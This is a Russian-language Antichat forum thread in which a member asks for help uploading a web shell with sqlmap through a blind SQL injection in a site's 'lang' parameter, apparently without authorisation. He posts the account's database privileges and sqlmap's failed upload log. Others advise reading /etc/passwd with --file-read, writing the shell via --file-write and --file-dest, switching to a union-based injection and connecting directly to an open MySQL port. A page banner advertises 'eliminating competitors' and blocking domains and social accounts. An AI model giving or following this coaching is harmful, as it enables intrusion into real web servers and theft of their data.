FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Песочница
sqlmap заливка шелла
Поиск по форуму
Расширенный поиск
Страница 1 из 2
1
2
>
Опции темы
Поиск в этой теме
Опции просмотра
#
1
06.11.2019, 12:58
hackworld
Новичок
Регистрация: 26.06.2019
Сообщений: 7
С нами:
3624086
Репутация:
0
Добрый день прошу помощи со sqlmapom ни как не могу залить шелл
Права у юзера есть
--is-dba: True
%lotos% (administrator) [28]:
privilege: ALTER
privilege: ALTER R
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TA
privilege: PROCESS
privilege: REFEREN
privilege: RELOAD
privilege: REPLICA
privilege: REPLICA
privilege: SELECT
privilege: SHOW DA
privilege: SHOW VI
privilege: SHUTDOW
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
SELECT @@GLOBAL.secure_file_priv;
'/var/lib/mysql-files/'
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
hackworld
Посмотреть профиль
Репутация
Найти все сообщения от hackworld
Добавить в друзья
#
2
06.11.2019, 13:14
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
Где логи действий? Где ответа сервера? Или нам представить нужно что ты делал и что не получается?
b3
Посмотреть профиль
Репутация
Отправить личное сообщение для b3
Посетить домашнюю страницу b3
Найти все сообщения от b3
Добавить в друзья
#
3
06.11.2019, 13:21
hackworld
Новичок
Регистрация: 26.06.2019
Сообщений: 7
С нами:
3624086
Репутация:
0
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[12:20:48] [INFO] going to use a web backdoor for command prompt
[12:20:48] [INFO] fingerprinting the back-end DBMS operating system
[12:20:48] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[12:21:00] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[12:21:04] [WARNING] unable to automatically parse any web server path
[12:21:04] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[12:21:04] [INFO] heuristics detected web page charset 'ascii'
[12:21:04] [WARNING] unable to upload the file stager on '/var/www/'
[12:21:04] [INFO] trying to upload the file stager on '/var/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:05] [WARNING] unable to upload the file stager on '/var/www/i/pages/'
[12:21:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[12:21:06] [WARNING] unable to upload the file stager on '/var/www/html/'
[12:21:06] [INFO] trying to upload the file stager on '/var/www/html/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:07] [WARNING] unable to upload the file stager on '/var/www/html/i/pages/'
[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[12:21:07] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:08] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/i/pages/'
[12:21:08] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[12:21:09] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[12:21:09] [INFO] trying to upload the file stager on '/var/www/nginx-default/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:10] [WARNING] unable to upload the file stager on '/var/www/nginx-default/i/pages/'
[12:21:10] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method
[12:21:10] [WARNING] unable to upload the file stager on '/srv/www/'
[12:21:10] [INFO] trying to upload the file stager on '/srv/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:11] [WARNING] unable to upload the file stager on '/srv/www/i/pages/'
[12:21:11] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 43 times
hackworld
Посмотреть профиль
Репутация
Найти все сообщения от hackworld
Добавить в друзья
#
4
06.11.2019, 13:29
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
Цитата:
Сообщение от
hackworld
↑
404 (Not Found) - 43 times
почему так много 404, там ваф? путь к doc_root известен или наугад?
b3
Посмотреть профиль
Репутация
Отправить личное сообщение для b3
Посетить домашнюю страницу b3
Найти все сообщения от b3
Добавить в друзья
#
5
06.11.2019, 13:54
hackworld
Новичок
Регистрация: 26.06.2019
Сообщений: 7
С нами:
3624086
Репутация:
0
путь не известен дефолтный список sqlmap
вафа вроде нет но сама скуля типа
Parameter: lang (GET)
Type: boolean-based blind
hackworld
Посмотреть профиль
Репутация
Найти все сообщения от hackworld
Добавить в друзья
#
6
06.11.2019, 13:58
fandor9
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
С нами:
3943766
Репутация:
47
Цитата:
Сообщение от
hackworld
↑
путь не известен дефолтный список sqlmap
вафа вроде нет но сама скуля типа
Parameter: lang (GET)
Type: boolean-based blind
ну так ищите сначала ошибку в сайтах, что-бы раскрывали вам путь.
fandor9
Посмотреть профиль
Репутация
Найти все сообщения от fandor9
Добавить в друзья
#
7
06.11.2019, 20:21
hackworld
Новичок
Регистрация: 26.06.2019
Сообщений: 7
С нами:
3624086
Репутация:
0
Цитата:
Сообщение от
fandor9
↑
ну так ищите сначала ошибку в сайтах, что-бы раскрывали вам путь.
это ясно я искал не нашел думал может подскажут другой какой вариант
hackworld
Посмотреть профиль
Репутация
Найти все сообщения от hackworld
Добавить в друзья
#
8
06.11.2019, 21:48
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
С нами:
4033046
Репутация:
212
Цитата:
Сообщение от
hackworld
↑
я искал
как?
Baskin-Robbins
Посмотреть профиль
Репутация
Найти все сообщения от Baskin-Robbins
Добавить в друзья
#
9
06.11.2019, 21:58
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
Цитата:
Сообщение от
hackworld
↑
это ясно я искал не нашел думал может подскажут другой какой вариант
попробуй сначала
--file-read="/etc/passwd" если считает,то нужно директорию найти будет на запись и залить туда через
Цитата:
Сообщение от
None
--file-write=FIL.. Write a local file on the back-end DBMS file system
--file-dest=FILE.. Back-end DBMS absolute filepath to write to
а не автоподбором
UPD
не заметил , Type: boolean-based blind
не зальешься,нужно union
grimnir
Посмотреть профиль
Репутация
Найти все сообщения от grimnir
Добавить в друзья
#
10
06.11.2019, 22:17
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
С нами:
4033046
Репутация:
212
если повезет - открыт 3306, можно подключаться удаленно, и сможешь расшифровать пароль, то как вариант подключиться к бд и оттуда залиться, но все равно надо путь искать
Baskin-Robbins
Посмотреть профиль
Репутация
Найти все сообщения от Baskin-Robbins
Добавить в друзья
Страница 1 из 2
1
2
>
«
Предыдущая тема
|
Следующая тема
»
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.